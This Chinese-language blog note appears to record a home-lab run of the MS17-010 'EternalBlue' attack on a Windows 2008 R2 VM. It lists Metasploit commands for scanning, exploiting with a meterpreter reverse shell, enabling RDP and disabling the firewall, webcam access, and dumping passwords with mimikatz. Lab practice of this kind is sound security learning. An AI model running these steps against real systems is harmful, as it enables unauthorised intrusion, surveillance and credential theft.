貓寧!!!
參考:
https://www.anquanke.com/post/id/86245
https://www.cnblogs.com/backlion/p/9484949.html
https://www.jianshu.com/p/91588e284fe8
“永恆之藍”利用Windows系統的SMB漏洞可以獲取系統最高權限,危害極大。
微軟的漏洞2個漏洞公告
https://support.microsoft.com/zh-cn/help/4012598/title
windows 2008R2鏡像從itellme站點獲取,種類齊全,比較乾淨。
記得進行新建,建立系統保留分區哦,用於存放系統引導文件,類似於centos7的/boot分區,可以避免系統無法正常啓動。
虛擬機中的Windows 2008 R2一定要設置爲網卡橋接模式
ip是192.168.100.27,先用nmap掃描一下有沒有永恆之藍漏洞存在,掃描腳本在/usr/share/nmap/scripts/
nmap --script smb-vuln-ms17-010.nse 192.168.100.27,表明開啓了445端口,存在漏洞。
msfconsole,啓動MSF
search ms17_010
use auxiliary/scanner/smb/smb_ms17_010,使用POC進行掃描
set RHOST 192.168.100.27
run
證實存在漏洞
use exploit/windows/smb/ms17_010_eternalblue
set RHOST 192.168.100.27
run
竟然把服務器給打重啓了,沒有連接上去
show payloads,看一下更多種類的payload,46個
show targets,顯示適用的目標
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp,這個payload非常有助於後期的植入後門進行權限維持。
set RHOST 192.168.100.27
run
成功進入服務器系統
screenshot,截屏
webcam_scream,可以開啓攝像頭
run post/windows/manage/enable_rdp,開啓遠程桌面並關閉防火牆
shell,直接進入系統
load mimikatz,加載密碼讀取工具
wdigest,成功獲取我的密碼
rdesktop 192.168.100.27 -u Administrator -p 111aaabbb!!!
遠程連接服務器就好了
arp查看內網情形
獲得當前木馬進程,getid
ps查看
獲取用戶的身份和權限
判斷服務器是不是被人在使用
run和bgrun,有大量的幫助文件
sysinfo,顯示計算機信息